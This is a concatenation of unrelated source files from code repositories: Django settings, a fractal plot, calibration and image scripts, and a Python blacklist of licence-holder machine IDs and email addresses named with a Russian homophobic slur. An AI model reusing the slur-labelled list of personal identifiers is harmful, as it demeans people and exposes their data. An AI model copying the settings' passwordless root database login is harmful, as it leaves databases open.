'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'api_core.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'rodin_db',
'USER': 'root',
'PASSWORD': '',
'HOST': '127.0.0.1',
'PORT': '3306',
}
}
CORS_ORIGIN_ALLOW_ALL = False
CORS_ORIGIN_WHITELIST = (
'http://localhost:8081',
)
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
[
"mmd.ri.it@gmail.com"
] |
mmd.ri.it@gmail.com
|
9182b439f5699b1b77c86aa69612ae3e6b0f112e
|
6ebba9e904886dd3596d39e290851216fab62156
|
/Exercie_1.py
|
9427d10c780511c15c6705824e1c6ff7f54c7afc
|
[] |
no_license
|
Haitam-Hansali/Les_Fractales
|
58072533f09ddde5491b30780280446483d8126d
|
e0cb5cffef17e0df86ef821c2a764bf528de4cb7
|
refs/heads/main
| 2023-01-28T16:05:40.234392
| 2020-11-28T14:21:00
| 2020-11-28T14:21:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,019
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 28 14:27:40 2020
@author: Hansali haitam
"""
#EXERCICE_1:
import matplotlib.pyplot as plt
import random
X =[0.5]
Y =[0]
for i in range(30000):
r =random.uniform(0,1)
if 0 <= r <= 0.1:
Xf = 0.05* X[i]
Yf = 0.6* Y[i]
elif 0.1 <= r <= 0.2:
Xf = 0.05* X[i]
Yf = 1 - (0.5* Y[i])
elif 0.2 <= r <= 0.4:
Xf = 0.46* X[i] - 0.32* Y[i]
Yf = (0.38* Y[i]) + (0.39* X[i]) + 0.6
elif 0.4 <= r <= 0.6:
Xf = 0.47* X[i] - 0.15* Y[i]
Yf = (0.42* Y[i]) + (0.14* X[i]) + 1.1
elif 0.6 <= r <= 0.8:
Xf = 0.43* X[i] + 0.28* Y[i]
Yf = (0.45* Y[i]) - (0.25* X[i]) + 1.0
elif 0.8 <= r <= 1:
Xf = 0.42* X[i] + 0.26* Y[i]
Yf = (0.31* Y[i]) - (0.35* X[i]) + 0.7
X.append(Xf)
Y.append(Yf)
ax =plt.gca()
ax.set_xticks([])
ax.set_yticks([])
plt.plot(X,Y,'g.')
plt.show()
|
[
"noreply@github.com"
] |
Haitam-Hansali.noreply@github.com
|
1a4163ff58787277a95099da0f8fa828d14ab105
|
4cd3295b965849e8ba829c1c6a278043d669fe3c
|
/test/проверить ключ на забанненность/pidors.py
|
9c48c7705d016bf94255816189c3ca21b23c7701
|
[] |
no_license
|
helljump/cm2
|
9b7cb68ad364f5e5a2ec96abe95e7926ddda4370
|
6bf6e669c4625cd71eda70f602426e931e12ccd4
|
refs/heads/master
| 2016-09-05T08:49:33.662783
| 2015-01-17T13:40:48
| 2015-01-17T13:40:48
| 29,391,628
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,369
|
py
|
pidors = [
'Admin-36EEA004231E4FD', 'tester-TESTER-PC', 'Z127474187545', 'Admin-5D60624B80B74DD', 'Osetr-OSETR-WORKPC',
'Admin-MICROSOF-D1F7B6', 'z318420669104', 'R378538586068', 'Z354179671638', 'dovbyshv@gmail.com',
'Admin-NAMAHATA', 'ADMIN-MEGA', 'user-ANATOLY', 'toomas-PLACEHOL-FVXEIE', 'Admin-MICROSOF-0FA2C5',
'main-MAMKA', 'User-HOME-2272192ACA', 'Z407785278918', 'Krasotka-KRASOTKA-PC', 'Admin-NYK-ISIF',
'alex-USER1', 'Admin-AIRENIKUS', 'Z364177327629', 'tester-TESTER', 'Admin-MICROSOF-5D4CB3',
'Vladas-VLADAS-DESIGN', 'j-MICROSOF-D7AAE5', 'Admin-MICROSOF-A4F9A9', 'Admin-MICROSOF-D7AAE5', 'Z209938775706',
'utk4-NETBEE', 'User-HOME-5B052D450C', 'Z381530833701', '$-FIGHT', 'UserXP-HOME-BBED38D37C',
'Admin-COMPUTER-BF5983', 'Z294957846224', 'Z863385200368', 'tollevin-TOLLEVIN12345', 'UserXP-HOME-AF91F0E2CB',
'Vladas-VLADAS', 'kuzen-KUZEN-A5E61ACEA', 'Art-DEEPRED', 'Z171537790994', 'main-MAIN',
'pavel-WIN-BYVBPS97TLN', 'Admin-MICROSOF-96C76B', 'Z141179337829', 'UserXP-HOME-8104D23600', 'dima-PADAYATRA',
'User-HOME-49883FD08C', 'User-HOME-6D8386E7BD', 'Docent-DOCENT123456', 'User-HOME-B4231ACC8F', '5555-MICROSOF-BA4F2D',
'User-LOCALHOST', 'Admin-MICROSOF-D4A669', 'DEEPSPACE-DEEPSPACE-PC', 'Admin-MICROSOF-7C49A8', 'Admin-MICROSOF-3CA4F6',
'Dom-DOM-D87A55BAD9E', 'Admin-MICROSOF-E748E3', 'R686764339675', 'denis-WIN-BYVBPS97TLN', 'myAdmin-MY-HOME1598756',
'Admin-H1', 'UserXP-HOME-56EA1333FF', 'pavel-SRV1', 'admin-VYPOLZ', 'Admin-MICROSOF-BF3AA2',
'Z237980445101', 'Admin-MICROSOF-9050E0', 'Dima-PADAYATRA', 'User-HOME-5C8A4CC313', 'textkitzlo',
'Admin-MICROSOF-9A31BC', 'R287406349391', 'MaxSvargal-MAXSVARGAL-PC', 'Osetr-OSETR-PC', 'Admin-MICROSOF-77E453',
'Vladas-1DESIGN-ORG', 'uset-MICROSOF-9DA107', 'Admin-MICROSOF-E8D59B', 'R405773058842', 'Admin-MICROSOF-8D6F73',
'Docent-DOCENT1234', 'Home-COMPUTER', 'maxseopro@gmail.com', 'myAdmin-MICROSOF-AC801B', 'Admin-MICROSOF-A1C9D0',
'Admin-MICROSOF-6C0423', 'Admin-MIROS', 'Admin-MICROSOF-296A1C', 'pavel-ASUS-MOBILE', 'Admin-MYPC',
'User-HOME-D38B3AF830', 'User-USER-493C30A778', 'Admin-PADAYATRA', 'shisherin-HOME-5A9FE54DDD', 'Fight-FIGHTP',
'Hazir-FEDOR', 'Z535321499778', 'Admin-NIMDA-FFE26C8BF', 'Z311980518699', 'Admin-MICROSOF-306451',
'Admin-MICROSOF-11A007', 'Actav-NOUT', 'ruzon@mail.ru', 'MaxSvargal-GREMLINGER', 'flint-web-FLINT-WEB-DELL',
'webmasterready01', 'user-USER5', 'UserXP-HOME-96D1C6840F', 'User-HOME-561C3107B4', 'Elenka-LENA',
'Foot-FOOTP', 'irina-WIN-BYVBPS97TLN', 'shish-SHISH-PC', 'Osetr-SASHA', 'Krasotka-KRASOTKA',
'IHTIO-STAS-PC', 'main-TATO', 'Zhendozz-WINXPSP3PC', 'mamulka-MAMKA', 'ADMIN-Z',
'serj-BELOUSVPERED', '131628996452', 'Admin-MYCOMP', 'Tolik-TOLIK123456', 'Admin-8EDDA6AE3C1D466',
'insvate@gmail.com', 'Z381046724716', 'User-DRU', 'Admin-MICROSOF-6A25EE', 'zZ-ZZ-8AC2E607YM87',
'Admin-MICROSOF-D2CF41', 'tom-NABSTER-A4DD5BD', 'Admin-DEEPBLUE', 'Admin-MICROSOF-BF23D0', 'Admin-MICROSOF-0DFDC9',
'admin-KOMP1', 'Admin-ADMIN-HP', 'Arvinoff-MYCOMP', 'Z281431441904', 'Admin-MICROSOF-82E526',
'Z407539695153', 'Admin-MICROSOF-9469EB', 'Lena-SMILE', 'Hazir-HAZIR-PC', 'Admin-MICROSOF-51AB03',
'Admin-REANIMAT-C622FB', 'User-HOME-76D36947F0', 'Admin-MICROSOF-9DA107', 'home-666999', 'tester-MICROSOFT-PC',
'Vladimir-PACKARD-B790554', 'admin-ADMIN-MSI', 'zZ-ZZ-GIGVLP9ICXUI', 'WMID014428692510', ]
|
[
"helljump@gmail.com"
] |
helljump@gmail.com
|
75a0f0b8dfb71da6a23800c1e35e0baa5bc226fd
|
17b86db5397233f70ba9db376bd16aca9e72a751
|
/algos/segmentation/__init__.py
|
80831405e3f4096582d1beefcfd9033fd7a84f3a
|
[] |
no_license
|
javieraltszyler/IATos
|
50595f97cfa7b58d5f44cce86e6022a1219d3fe9
|
b3d5409d53b357f755e2d6a30ee1126c9de27534
|
refs/heads/main
| 2023-07-27T12:57:33.051010
| 2021-09-06T23:59:01
| 2021-09-06T23:59:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 63
|
py
|
from .entrypoint import find_caugh_segments, SegmentationParams
|
[
"dtrejopizzo@gmail.com"
] |
dtrejopizzo@gmail.com
|
ba234cf0c4b8f005e5bff6a3b7e6f08306842a0a
|
389acfd2f2f6f4869ad969f7820931f1077cd903
|
/bcdoc/compat.py
|
ee6d7c910b75b94246c2aa8df1621434c95e2828
|
[
"Apache-2.0"
] |
permissive
|
boto/bcdoc
|
567dcf892004022fffb0e307550676eb8727b7f5
|
eb14c2a4ecde75fae60ec0cb7d4147929a14d007
|
refs/heads/develop
| 2023-09-03T23:59:58.507910
| 2015-06-17T19:23:20
| 2015-06-17T19:23:20
| 9,522,814
| 5
| 7
|
NOASSERTION
| 2020-01-16T19:02:54
| 2013-04-18T13:55:05
|
Python
|
UTF-8
|
Python
| false
| false
| 723
|
py
|
# Copyright 2012-2013 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
try:
from collections import OrderedDict
except ImportError:
# Python2.6 we use the 3rd party back port.
from ordereddict import OrderedDict
|
[
"kyleknap@amazon.com"
] |
kyleknap@amazon.com
|
00dacc8d53715bca065ecc63fda00d4fea71256c
|
fc2b62504f2e832c2aac4d5a6ac39ecf52a8d65f
|
/FEL-SSU/03 EM/snippets.py
|
e03353f5358c6b8a7074e7f9897797ba91af4ead
|
[] |
no_license
|
LukasHromadnik/CVUT
|
a995108e9f2b3f79551befb3b1399cee26edf7d4
|
18be904784ebb8ef33ab7009560686968a7a8e27
|
refs/heads/master
| 2023-01-07T10:16:20.219423
| 2022-12-27T07:00:18
| 2022-12-27T07:00:18
| 217,048,219
| 7
| 2
| null | 2022-12-14T06:19:52
| 2019-10-23T12:10:18
|
C++
|
UTF-8
|
Python
| false
| false
| 1,593
|
py
|
#!/usr/local/bin/python3
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
def to_image(img):
formatted = (img * 255).astype('uint8')
return Image.fromarray(formatted)
def compute_error(image, ground_truth):
diff = np.sum(abs(ground_truth - image))
result = diff / image.size
if result > 0.5:
result = 1 - result
return result * 100
# Print full array
# np.set_printoptions(threshold=np.nan)
def load_image(image_name):
im = Image.open(image_name).convert("RGB")
return np.array(im, dtype=np.float64) / 255.0
def plot_image(image, title=''):
plt.clf()
plt.axis('off')
plt.title(title)
plt.imshow(image)
plt.show()
def compute_mean(hand, is_foreground):
model = "model_init.png"
image = Image.open(model).convert("RGB")
arr = np.array(image, dtype=np.float64) / 255.0
background = 0.11764706
# middle = 0.50196078
foreground = 0.88235294
if is_foreground:
arr[arr > foreground] = 1
arr[arr < foreground] = 0
else:
arr[arr > background] = 2
arr[arr < background] = 1
arr[arr > 1] = 0
hand_copy = np.array(hand, copy=True)
counter = 0
w, h, d = tuple(hand_copy.shape)
for i in range(w):
for j in range(h):
if arr[i, j, 0] == 0:
hand_copy[i, j, 0] = 0
hand_copy[i, j, 1] = 0
hand_copy[i, j, 2] = 0
else:
counter += 1
mean = np.sum(hand_copy, axis=1)
mean = np.sum(mean, axis=0) / counter
return mean
|
[
"lukas.hromadnik@ackee.cz"
] |
lukas.hromadnik@ackee.cz
|
ca2f8bfe7c4032f38c05e442f2ebc72410381486
|
bd1b1fda138e6687dadc57317c3e312bc8872600
|
/mycode/lintcode/DP/non 584 drop-eggs-ii.py
|
b26afb05ade277e780791bb3532c797249226521
|
[] |
no_license
|
dundunmao/lint_leet
|
fc185038f57e0c5cbb82a74cebd4fe00422416cb
|
5788bd7b154649d2f787bbc4feb717ff2f4b4c59
|
refs/heads/master
| 2020-11-30T04:56:25.553327
| 2017-10-22T07:11:01
| 2017-10-22T07:11:01
| 96,705,212
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 437
|
py
|
# coding:utf-8
# There is a building of n floors. If an egg drops from the k th floor or above, it will break. If it's dropped from any floor below, it will not break.
#
# You're given m eggs, Find k while minimize the number of drops for the worst case. Return the number of drops in the worst case.
#
# 您在真实的面试中是否遇到过这个题? Yes
# 样例
# Given m = 2, n = 100 return 14
# Given m = 2, n = 36 return 8
#
|
[
"dundunmao@gmail.com"
] |
dundunmao@gmail.com
|
ef2d49c6e8228d0db0cf4085723da7fb6610f6dd
|
914349e17aa5db5bd68e5a7535bdf693776a08b2
|
/calib/utils/summaries.py
|
51d5a3ea7a53e1f77e672e9b187ff5248b38ad6e
|
[] |
no_license
|
dirichletcal/experiments_neurips
|
f45007aa752597999d2c3bf11bdace34362968c0
|
54989edf11995f7f0f8390766e51133373044db2
|
refs/heads/master
| 2023-04-01T14:55:20.906559
| 2022-12-06T18:04:38
| 2022-12-06T18:04:38
| 217,910,102
| 17
| 5
| null | 2023-03-25T00:58:47
| 2019-10-27T20:08:11
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 53,965
|
py
|
import os
import re
import pandas as pd
import numpy as np
import math
from functools import partial
from calib.utils.functions import rankings_to_latex
# Visualisations
from calib.utils.plots import df_to_heatmap
from calib.utils.plots import export_dataset_analysis
from calib.utils.plots import export_critical_difference
from scipy.stats import ranksums
from scipy.stats import mannwhitneyu
from scipy.stats import friedmanchisquare
from scipy.stats import rankdata
import matplotlib.pyplot as pyplot
pd.set_option('display.width', 1000)
def load_all_csv(results_path, expression=".*.csv"):
regexp = re.compile(expression)
filename_list = []
df_list = []
for root, subdirs, files in os.walk(results_path, followlinks=True):
file_list = list(filter(regexp.match, files))
for filename in file_list:
if filename in filename_list:
continue
filename_list += filename
classifier = filename.split('_')[0]
try:
df_list.append(pd.read_csv(os.path.join(root, filename)))
df_list[-1]['classifier'] = classifier
df_list[-1]['filename'] = filename
except pd.errors.EmptyDataError as e:
print(e)
print('Classifier = {}, filename = {}'.format(classifier,
filename))
if df_list:
df = pd.concat(df_list)
else:
df = pd.DataFrame()
return df
def create_summary_path(summary_path, results_path='./'):
if summary_path is None:
summary_path = os.path.join(results_path, 'summary')
# Creates summary path if it does not exist
if not os.path.exists(summary_path):
print(summary_path)
os.makedirs(summary_path)
return summary_path
def compute_ranksums(table):
return paired_test(table, stats_func=ranksums)
def compute_mannwhitneyu(table):
return paired_test(table, stats_func=partial(mannwhitneyu,
alternative='less'))
def compute_friedmanchisquare(table):
'''
Example:
- n wine judges each rate k different wines. Are any of the k wines
ranked consistently higher or lower than the others?
Our Calibration case:
- n datasets each rate k different calibration methods. Are any of the
k calibration methods ranked consistently higher or lower than the
others?
This will output a statistic and a p-value
SciPy does the following:
- k: is the number of parameters passed to the function
- n: is the lenght of each array passed to the function
The two options for the given table are:
- k is the datasets: table['mean'].values).tolist()
- k is the calibration methods: table['mean'].T.values).tolist()
'''
if table.shape[1] < 3:
print('Friedman test not appropiate for less than 3 methods')
class Ftest():
def __init__(self, statistic, pvalue):
self.statistic = statistic
self.pvalue = pvalue
return Ftest(np.nan, np.nan)
return friedmanchisquare(*(table.T.values).tolist())
def paired_test(table, stats_func=ranksums):
measure = table.columns.levels[0].values[0]
pvalues = np.zeros((table.columns.shape[0], table.columns.shape[0]))
statistics = np.zeros_like(pvalues)
for i, method_i in enumerate(table.columns.levels[1]):
for j, method_j in enumerate(table.columns.levels[1]):
if i == j:
continue
sample_i = table[measure, method_i]
sample_j = table[measure, method_j]
try:
statistic, pvalue = stats_func(sample_i, sample_j)
except ValueError as e:
print(e)
statistic, pvalue = np.nan, np.nan
pvalues[i, j] = pvalue
statistics[i, j] = statistic
index = pd.MultiIndex.from_product([table.columns.levels[1],
['statistic']])
df_statistics = pd.DataFrame(statistics,
index=table.columns.levels[1],
columns=index)
index = pd.MultiIndex.from_product([table.columns.levels[1],
['pvalue']])
df_pvalues = pd.DataFrame(pvalues,
index=table.columns.levels[1],
columns=index)
return df_statistics.join(df_pvalues)
def export_statistic_to_latex(df_statistic, filename, threshold=0.005,
caption='', label='', fontsize='\\small',
str_format='%.1f', position='tph'):
def pvalue_to_tex(s, p, threshold):
s = str_format % s
if p < threshold:
s = '\\bf{' + s + '}'
return s
statistics = df_statistic.xs('statistic', axis=1, level=1, drop_level=False)
pvalues = df_statistic.xs('pvalue', axis=1, level=1, drop_level=False)
table = np.empty((df_statistic.index.shape[0],
df_statistic.columns.levels[0].shape[0]),
dtype=np.object_)
for i, method_i in enumerate(df_statistic.index):
for j, method_j in enumerate(df_statistic.index):
table[i, j] = pvalue_to_tex(statistics.iloc[i, j],
pvalues.iloc[i, j],
threshold)
index = [x.replace('_', '\_') for x in df_statistic.index]
columns = [x.replace('_', '\_') for x in df_statistic.columns.levels[0]]
df = pd.DataFrame(table, index=index, columns=columns)
tex_table = df.to_latex(escape=False)
tex_table = ('\\begin{table}[' + position + ']\n\\centering\n' +
fontsize + '\n' + tex_table + ('\\caption{{{}}}\n' +
'\\label{{{}}}\n').format(caption, label) +
'\\end{table}')
with open(filename, 'w') as f:
f.write(tex_table)
def summarise_confusion_matrices(df, summary_path, set_title=False,
figsize=(16.5, 23.4)):
'''
figsize
- (8.27, 11.69) for an A4
- (11.69, 16.53) for an A3
- (16.5, 23.4) for an A2
'''
def MakeList(x):
T = tuple(x)
if len(T) > 1:
return T
else:
return T[0]
def confusion_matrix(string):
cm = np.fromstring(''.join(c for c in string if c in '0123456789 '), sep=' ')
cm = cm.reshape(int(np.sqrt(len(cm))), -1)
return cm
df['confusion_matrix'] = df['confusion_matrix'].apply(confusion_matrix)
for calibrator in df['method'].unique():
df_aux = df[df['method'] == calibrator]
df_aux = df_aux.pivot_table(index=['dataset'], columns=['classifier'],
values=['confusion_matrix'], aggfunc=MakeList)
fig = pyplot.figure(figsize=figsize) # (df_aux.shape[1]*3, df_aux.shape[0]*3))
if set_title:
fig.suptitle(calibrator)
ij = 1
for i, dat in enumerate(df_aux.index):
for j, cla in enumerate(df_aux.columns.levels[1]):
values = df_aux.loc[dat, ('confusion_matrix', cla)]
ax = fig.add_subplot(len(df_aux), len(df_aux.columns), ij)
if j == 0:
ax.set_ylabel(dat[:10])
if i == 0:
ax.set_title(cla)
ij += 1
if values is None:
print('There are no confusion matrices for {}, {}, {}'.format(
calibrator, dat, cla))
ax.set_xticklabels([])
ax.set_yticklabels([])
continue
cms = np.stack(values).mean(axis=0)
# FIXME solve problem here, it seems that values is always
# empty?
if isinstance(cms, np.float):
continue
cax = ax.pcolor(cms)
middle_value = (cms.max() + cms.min())/2.0
fontsize = min((30/(cms.shape[0]-2), 9))
for y in range(cms.shape[0]):
for x in range(cms.shape[1]):
color = 'white' if middle_value > cms[y, x] else 'black'
ax.text(x + 0.5, y + 0.5, '%.1f' % cms[y, x],
horizontalalignment='center',
verticalalignment='center',
color=color, fontsize=fontsize
)
ax.invert_yaxis()
fig.subplots_adjust(hspace = 0.0)
fig.tight_layout()
fig.savefig(os.path.join(summary_path,
'confusion_matrices_{}.pdf'.format(calibrator)))
def summarise_hyperparameters(df, summary_path, set_title=False,
figsize=(16.5, 23.4)):
'''
figsize
- (8.27, 11.69) for an A4
- (11.69, 16.53) for an A3
- (16.5, 23.4) for an A2
'''
def MakeList(x):
T = tuple(x)
if len(T) > 1:
return T
else:
return T[0]
# Histograms of parameters
MAP_METHOD = {'OvR_Freq_Bin': 'n_bins=(?P<bins>\w+), ',
'OvR_Width_Bin': 'n_bins=(?P<bins>\w+), ',
'Dirichlet_L2': " 'l2': ([0-9\.\-e]+),",
'OvR_Beta_L2': " 'l2': ([0-9\.\-e]+),",
'dir_full_comp_l2': " 'l2': ([0-9\.\-e]+),",
'dirichlet_full_prefixdiag_l2': " 'l2': ([0-9\.\-e]+),",
'Log_Reg_L2': " 'C': ([0-9\.\-e]+),",
'mlr_logit': " 'C': ([0-9\.\-e]+),",
'OvR_Log_Reg_L2': " 'C': ([0-9\.\-e]+),",
'ovr_mlr_logit': " 'C': ([0-9\.\-e]+),",
}
for key, regex in MAP_METHOD.items():
df_aux = df[df['method'] == key][['dataset', 'classifier', 'calibrators']]
if len(df_aux) == 0:
continue
df_aux['calibrators'] = df_aux['calibrators'].apply(lambda x:
np.array(re.findall(regex,
x)).astype(float))
df_aux = df_aux.pivot_table(index=['dataset'], columns=['classifier'],
values=['calibrators'], aggfunc=MakeList)
all_flat = df_aux.values.flatten()
all_flat = all_flat[all_flat != None]
all_flat = np.hstack(sum([aux for aux in all_flat if not
isinstance(aux, float)], ()))
all_unique = np.unique(all_flat)
sorted_idx = np.argsort(all_unique)
if (all_unique == np.floor(all_unique)).all():
xticklabels = [str(int(x)) for x in all_unique[sorted_idx]]
else:
xticklabels = [np.format_float_scientific(x, precision=2) for x in
all_unique[sorted_idx]]
print('Unique hyperparameters')
print(all_unique)
# Generate one barplot with all hyperparameters
fig = pyplot.figure(figsize=(3,2))
ax = fig.add_subplot(111)
uniq, counts = np.unique(all_flat, return_counts=True)
sorted_idx = np.argsort(uniq)
uniq = uniq[sorted_idx]
counts = counts[sorted_idx]
ax.bar(sorted_idx, counts)
ax.set_xticks(sorted_idx)
ax.set_xticklabels(xticklabels, rotation=45, ha='right')
fig.tight_layout()
fig.savefig(os.path.join(summary_path, 'bars_hyperparameters_all_{}.pdf'.format(key)))
# Generate one barplot per dataset and classifier combination
#fig = pyplot.figure(figsize=(df_aux.shape[1]*3, df_aux.shape[0]*3))
fig = pyplot.figure(figsize=figsize)
if set_title:
fig.suptitle(key)
ij = 0
for i, dat in enumerate(df_aux.index):
for j, cla in enumerate(df_aux.columns.levels[1]):
ij += 1
values = df_aux.loc[dat, ('calibrators', cla)]
ax = fig.add_subplot(len(df_aux), len(df_aux.columns), ij)
if isinstance(values, float) and math.isnan(values):
print('There are no hyperparameters for {}, {}, {}'.format(
key, dat, cla))
values = [[]]
parameters = np.concatenate(values).flatten()
uniq, counts = np.unique(parameters, return_counts=True)
missing_uniq = []
missing_counts = []
for all_u in all_unique:
if all_u not in uniq:
missing_uniq.append(all_u)
missing_counts.append(0)
uniq = np.concatenate((uniq, missing_uniq))
counts = np.concatenate((counts, missing_counts))
sorted_idx = np.argsort(uniq)
counts = counts[sorted_idx]
ax.bar(sorted_idx, counts)
ax.set_xticks(sorted_idx)
if j == 0:
ax.set_ylabel(dat[:10])
if i == 0:
ax.set_title(cla)
if i == len(df_aux.index)-1:
ax.set_xticklabels(xticklabels, rotation=45, ha='right')
else:
ax.set_xticklabels([])
fig.subplots_adjust(hspace = 0.0)
fig.tight_layout()
fig.savefig(os.path.join(summary_path, 'bars_hyperparameters_{}.pdf'.format(key)))
# heatmaps of parameters
# FIXME change MAP method as it is not being used
def weight_matrix(string, restore_last_class=False):
solution = re.findall("'weights_': array(.*?)]]\)", string, flags=re.DOTALL)
matrices = []
for s in solution:
x = np.fromstring(''.join(c for c in s if c in
'0123456789.-e+,'), sep=',')
x = x.reshape(int(np.floor(np.sqrt(len(x)))), -1)
if restore_last_class:
col_sums = np.sum(x,axis=0)
amount_to_shift = ( col_sums[:-1] - np.diag(x) ) / (x.shape[0]-1)
x = x - np.concatenate((amount_to_shift,[0]))
x[:,-1] = x[:,-1] - col_sums[-1] / x.shape[0]
matrices.append(x)
return matrices
weight_matrix_rlc = partial(weight_matrix, restore_last_class=True)
def weight_matrix_theorem5(string):
solution = re.findall("'weights_': array(.*?)]]\)", string, flags=re.DOTALL)
matrices = []
for s in solution:
W = np.fromstring(''.join(c for c in s if c in
'0123456789.-e+,'), sep=',')
W = W.reshape(int(np.floor(np.sqrt(len(W)))), -1)
b = W[:, -1]
W = W[:,:-1]
col_min = np.min(W,axis=0)
A = W - col_min
softmax = lambda z:np.divide(np.exp(z), np.sum(np.exp(z)))
c = softmax(np.matmul(W, np.log(np.ones(len(b))/len(b))) + b)
matrices.append(np.hstack((A, c.reshape(-1,1))))
return matrices
def weights_keras(string):
coeficients = re.findall("'weights': \[array(.*?)]]", string, flags=re.DOTALL)
intercepts = re.findall(", array\(\[(.*?)]", string, flags=re.DOTALL)
matrices = []
for coef, inter in zip(coeficients, intercepts):
coef = np.fromstring(''.join(c for c in coef if c in
'0123456789.-e+,'), sep=',')
coef = coef.reshape(int(np.floor(np.sqrt(len(coef)))), -1)
inter = np.fromstring(''.join(c for c in inter if c in
'0123456789.-e+,'), sep=',')
x = np.vstack((coef.T, inter)).T
matrices.append(x)
return matrices
def coef_intercept_matrix(string):
coeficients = re.findall("'coef_': array(.*?)]]\)", string, flags=re.DOTALL)
intercepts = re.findall("'intercept_': array(.*?)]\)", string, flags=re.DOTALL)
matrices = []
for coef, inter in zip(coeficients, intercepts):
coef = np.fromstring(''.join(c for c in coef if c in
'0123456789.-e+,'), sep=',')
coef = coef.reshape(int(np.floor(np.sqrt(len(coef)))), -1)
inter = np.fromstring(''.join(c for c in inter if c in
'0123456789.-e+,'), sep=',')
x = np.vstack((coef.T, inter)).T
matrices.append(x)
return matrices
MAP_METHOD = {'Dirichlet_L2': weight_matrix_theorem5,
'dir_keras': weights_keras,
'dir_full_gen': weight_matrix,
'dir_full_comp_l2': weight_matrix_theorem5,
'OvR_Beta': weight_matrix,
'dirichlet_full_prefixdiag_l2': weight_matrix_theorem5,
'mlr_log': coef_intercept_matrix,
'mlr_logit': coef_intercept_matrix,
'ovr_mlr_log': coef_intercept_matrix,
'ovr_mlr_logit': coef_intercept_matrix
}
for key, function in MAP_METHOD.items():
df_aux = df[df['method'] == key][['dataset', 'classifier', 'calibrators']]
if len(df_aux) == 0:
continue
df_aux['calibrators'] = df_aux['calibrators'].apply(function)
df_aux = df_aux.pivot_table(index=['dataset'], columns=['classifier'],
values=['calibrators'],
aggfunc=MakeList)
fig = pyplot.figure(figsize=(df_aux.shape[1]*3, df_aux.shape[0]*3))
fig.suptitle(key)
ij = 1
for i, dat in enumerate(df_aux.index):
for j, cla in enumerate(df_aux.columns.levels[1]):
values = df_aux.loc[dat, ('calibrators', cla)]
ax = fig.add_subplot(len(df_aux), len(df_aux.columns), ij)
if j == 0:
ax.set_ylabel(dat)
if i == 0:
ax.set_title(cla)
ij += 1
if isinstance(values, float) and math.isnan(values):
continue
# Stacking (#iter x #crossval x #crossval) on first dimension
parameters = np.concatenate(values).mean(axis=0)
# Dirichlet Theorem5
if key in ['Dirichlet_L2', 'dir_full_comp_l2',
'dirichlet_full_prefixdiag_l2']:
col_min = np.min(parameters,axis=0)[:-1]
parameters[:,:-1] = parameters[:,:-1] - col_min
# FIXME solve problem here, it seems that values is always
# empty?
if isinstance(parameters, np.float):
continue
cax = ax.pcolor(parameters)
middle_value = (parameters.max() + parameters.min())/2.0
fontsize = min((20/(parameters.shape[0]-2), 9))
for y in range(parameters.shape[0]):
for x in range(parameters.shape[1]):
color = 'white' if middle_value > parameters[y, x] else 'black'
ax.text(x + 0.5, y + 0.5, '%.e' % parameters[y, x],
horizontalalignment='center',
verticalalignment='center',
color=color, fontsize=fontsize
)
ax.invert_yaxis()
fig.tight_layout(rect=[0, 0.03, 1, 0.95])
fig.savefig(os.path.join(summary_path, 'heatmap_weights_{}.svg'.format(key)))
def generate_summaries(df, summary_path, table_size='small',
hyperparameters=True, confusion_matrices=True,
reduced_names=True):
'''
df: pandas.DataFrame
The dataframe needs at least the following columns
- 'dataset': name of the dataset
- 'n_classes':
- 'n_features':
- 'n_samples':
- 'method': calibration method (or method to compare)
- 'mc': Monte Carlo iteration
- 'test_fold': Number of the test fold
- 'train_acc': Training Accuracy
- 'train_loss': Training log-loss
- 'train_brier': Training Brier score
- 'train_guo-ece': Training binary ECE score
- 'train_cla-ece': Training classwise ECE score
- 'train_full-ece': Training full ECE score
- 'train_mce': Training MCE score
- 'acc': Accuracy
- 'loss': log-loss
- 'brier': Brier score
- 'guo-ece': Binary ECE score
- 'cla-ece': Classwise ECE score
- 'full-ece': Full ECE score
- 'p-guo-ece': p-value Guo ECE score
- 'p-cla-ece': p-value Classwise ECE score
- 'p-full-ece': p-value Full ECE score
- 'mce': MCE score
- 'exec_time': Mean execution time
- 'classifier': Original classifier used to train
- 'calibrators': List of calibrators with their parameters
'''
# Change name of metrics
df.rename({'guo-ece': 'conf-ece', 'p-guo-ece': 'p-conf-ece',
'train_guo-ece': 'train_conf-ece',
'cla-ece': 'cw-ece', 'p-cla-ece': 'p-cw-ece',
'train_cla-ece': 'train_cw-ece'},
axis='columns', inplace=True)
# Shorten some names
shorten = dict(dirichlet='dir', binning='bin', logistic='mlr',
uncalibrated='uncal')
for key, value in shorten.items():
